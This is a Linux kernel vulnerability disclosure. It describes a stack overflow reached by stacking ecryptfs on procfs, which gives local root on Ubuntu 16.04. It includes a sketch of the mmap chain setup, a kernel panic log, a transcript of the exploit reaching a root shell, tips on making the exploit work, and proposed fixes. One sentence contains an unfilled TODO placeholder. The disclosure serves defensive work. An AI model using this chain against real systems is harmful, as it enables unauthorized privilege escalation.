Stacking filesystems, including ecryptfs, protect themselves against
deep nesting, which would lead to kernel stack overflow, by tracking
the recursion depth of filesystems. E.g. in ecryptfs, this is
implemented in ecryptfs_mount() as follows:
```
	s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;

	rc = -EINVAL;
	if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
		pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
		goto out_free;
	}
```
The files /proc/$pid/{mem,environ,cmdline}, when read, access the
userspace memory of the target process, involving, if necessary,
normal pagefault handling. If it were possible to mmap() them, an
attacker could create a chain of e.g. /proc/$pid/environ mappings
where process 1 has /proc/2/environ mapped into its environment area,
process 2 has /proc/3/environ mapped into its environment area and so
on. A read from /proc/1/environ would invoke the pagefault handler for
process 1, which would invoke the pagefault handler for process 2 and
so on. This would, again, lead to kernel stack overflow.
One interesting fact about ecryptfs is that, because of the encryption
involved, it doesn't just forward mmap to the lower file's mmap
operation. Instead, it has its own page cache, maintained using the
normal filemap helpers, and performs its cryptographic operations when
dirty pages need to be written out or when pages need to be faulted
in. Therefore, not only its read and write handlers but also its mmap
handler uses only the lower filesystem's read and write methods.
This means that using ecryptfs, you can mmap [decrypted views of]
files that normally wouldn't be mappable.
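As a rough illustration, here is a minimal sketch of the eCryptfs
approach (simplified, not the verbatim kernel code;
ecryptfs_decrypt_page() is the real eCryptfs helper that internally
reads the ciphertext from the lower file):
```
/* Simplified sketch of eCryptfs' ->readpage: the same handler backs
 * both read() and mmap() faults, and it fills eCryptfs' own page-cache
 * page by *reading* ciphertext from the lower file and decrypting it;
 * the lower filesystem's mmap operation is never used. */
static int ecryptfs_style_readpage(struct file *file, struct page *page)
{
	int rc;

	/* Internally ends up in kernel_read() on the lower file, then
	 * decrypts the data in place. */
	rc = ecryptfs_decrypt_page(page);
	if (rc)
		ClearPageUptodate(page);
	else
		SetPageUptodate(page);
	unlock_page(page);
	return rc;
}
```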
Combining these things, it is possible to trigger recursion with
arbitrary depth (a per-process setup sketch follows the list) where:
- a reading userspace memory access in process A (from userland or
  from copy_from_user())
- causes a pagefault in an ecryptfs mapping in process A, which
- causes a read from /proc/{B}/environ, which
- causes a pagefault in an ecryptfs mapping in process B, which
- causes a read from /proc/{C}/environ, which
- causes a pagefault in an ecryptfs mapping in process C, and so on.
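A heavily simplified sketch of one link in such a chain (the ecryptfs
mount setup is omitted and the path is hypothetical; the real PoC has
to arrange the mounts first):
```
/* One link in the chain (sketch; assumes an ecryptfs view of
 * /proc/<next_pid> is already mounted somewhere, with "environ"
 * visible through it): map the decrypted view of the next process's
 * environ file over our own environment area, so that any fault on
 * our environment triggers a read of /proc/<next_pid>/environ. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

extern char **environ;

static int link_into_chain(const char *path /* e.g. <mnt>/environ */)
{
	int fd = open(path, O_RDONLY);
	if (fd < 0) { perror("open"); return -1; }

	/* Page-align the address of our first environment string and
	 * map the ecryptfs file on top of it; MAP_FIXED replaces the
	 * old mapping. */
	unsigned long page = (unsigned long)environ[0] & ~0xfffUL;
	if (mmap((void *)page, 0x1000, PROT_READ,
	         MAP_PRIVATE | MAP_FIXED, fd, 0) == MAP_FAILED) {
		perror("mmap");
		close(fd);
		return -1;
	}
	return 0;
}
```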
On systems with the /sbin/mount.ecryptfs_private helper installed
(e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked
during installation), this bug can be triggered by an unprivileged
user. The mount helper considers /proc/$pid, where $pid is the PID of
a process owned by the user, to be a valid mount source because the
directory is "owned" by the user.
I have attached both a generic crash PoC and a build-specific exploit
that can be used to gain root privileges from a normal user account on
Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version
4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu
SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
dmesg output of the crasher:
```
[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] PGD 1e0d067 PUD 0
[ 80.040028] Thread overran stack, or stack corrupted
[ 80.040028] Oops: 0000 [#1] SMP
[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046
[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
[ 80.040028] Stack:
[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
[ 80.040028] Call Trace:
[ 80.040028] <IRQ>
[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160
[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60
[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
[ 80.040028] <EOI>
[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d
[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP <ffff88021fc03d70>
[ 80.040028] CR2: fffffffe4b9145c0
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] ---[ end trace 616e3de50958c35b ]---
[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
[ 80.040028] Shutting down cpus with NMI
[ 80.040028] Kernel Offset: disabled
[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
```
Example run of the exploit in a VM with 4 cores and Ubuntu 16.04 installed:
```
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit.c hello.c suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
all spammers ready
recurser parent ready
spam over
fault chain set up, faulting now
writing stackframes
stackframes written
killing 2494
post-corruption code is alive!
children should be dead
coredump handler set. recurser exiting.
going to crash now
suid file detected, launching rootshell...
we have root privs now...
root@user-VirtualBox:/proc# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
```
(If the exploit crashes even with the right kernel version, try
restarting the machine. Also, ensure that no program like top/htop/...
is running that might try to read process command lines. Note that
the PoC and the exploit don't really clean up after themselves and
leave mountpoints behind that prevent them from re-running without
a reboot or manual unmounting.)
Note that Ubuntu compiled their kernel with
CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used
to be to exploit this bug without crashing the kernel,
and an overwrite of addr_limit would be useless because at the
time the thread_info is overwritten, there are multiple instances of
kernel_read() on the stack. Still, the bug is exploitable by carefully
aligning the stack so that the vital components of thread_info are
preserved, stopping with an out-of-bounds stack pointer and
overwriting the thread stack using a normal write to an adjacent
allocation of the buddy allocator.
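For reference, the check that CONFIG_SCHED_STACK_END_CHECK enables
looks like this (simplified from include/linux/sched.h):
```
/* With CONFIG_SCHED_STACK_END_CHECK, schedule_debug() verifies on
 * every scheduler invocation that the magic value at the end of the
 * thread stack is still intact. */
#define task_stack_end_corrupted(task) \
	(*(end_of_stack(task)) != STACK_END_MAGIC)
```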
Regarding the fix, I think the following would be reasonable:
- Explicitly forbid stacking anything on top of procfs by setting its
  s_stack_depth to a sufficiently large value; a sketch of this (and
  of the next suggestion) follows the list. In my opinion, there is
  too much magic going on inside procfs to allow stacking things on
  top of it, and there isn't any good reason to do it. (For
example, ecryptfs invokes open handlers from a kernel thread
instead of normal user process context, so the access checks inside
VFS open handlers are probably ineffective - and procfs relies
heavily on those.)
- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the
lower filesystem doesn't expect to be called in pagefault-handling
context, it probably shouldn't be called in that context.
- Create a dedicated kernel stack cache outside of the direct mapping
of physical memory that has a guard page (or a multi-page gap) at
the bottom of each stack, and move the struct thread_info to a
different place (if nothing else works, the top of the stack, above
the pt_regs).
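Minimal sketches of the first two suggestions (hypothetical patch
fragments, simplified; exact placement and error handling would differ
in a real patch):
```
/* Suggestion 1 (in fs/proc/inode.c, proc_fill_super()): mark procfs
 * as already at the maximum stacking depth, so that stacking
 * filesystems' depth checks - like the ecryptfs one quoted at the
 * top - refuse to use procfs as a lower filesystem. */
	s->s_stack_depth = FILESYSTEM_MAX_STACK_DEPTH;

/* Suggestion 2 (in eCryptfs, where the lower file is opened): refuse
 * lower files without an mmap handler, since their read/write methods
 * don't expect to be called in pagefault-handling context. */
	if (!lower_file->f_op->mmap) {
		fput(lower_file);
		rc = -EMEDIUMTYPE; /* hypothetical error-code choice */
		goto out;
	}
```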
While e.g. race conditions are more common than stack overflows in
the Linux kernel, the whole vulnerability class of stack overflows
is easy to mitigate, and the kernel is sufficiently complicated for
unbounded recursion to emerge in unexpected places - or perhaps
even for someone to discover a way to create a call stack whose
depth is bounded but still too large. Therefore, I believe that guard
pages are a useful mitigation.
Nearly everywhere, stack overflows are caught using guard pages
nowadays; this includes Linux userland, but also {### TODO ###}
and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`
in schedule_debug() ought to be a direct panic instead of an oops. At
the moment, when you hit it, you get a recursion between the scheduler
invocation in do_exit() and the BUG_ON in the scheduler, and the
kernel recurses down the stack until it hits something sufficiently
important to cause a panic.
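A sketch of that change (against kernel/sched/core.c in this kernel
version; simplified):
```
/* Panic directly instead of BUG_ON(): the oops path calls do_exit(),
 * which re-enters the scheduler and hits the check again, recursing
 * down the (already corrupted) stack. */
static inline void schedule_debug(struct task_struct *prev)
{
#ifdef CONFIG_SCHED_STACK_END_CHECK
	if (task_stack_end_corrupted(prev))
		panic("corrupted stack end detected inside scheduler\n");
#endif
	/* ... rest of schedule_debug() unchanged ... */
}
```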
I'm going to send (compile-tested) patches for my first two fix
suggestions and the recursive oops bug. I haven't written a patch for
the guard pages mitigation - I'm not familiar enough with the x86
subsystem for that.
Notes regarding the exploit:
- It makes an invalid assumption that causes it to require at least
  around 6GB of RAM.
- It has a trivially avoidable race that causes it to fail on
  single-core systems after overwriting the coredump handler; if this
  happens, it's still possible to manually trigger a coredump and
  execute the suid helper to get a root shell.
- The page spraying is pretty primitive and racy; while it works
  reliably for me, there might be influencing factors that cause it
  to fail on other people's machines.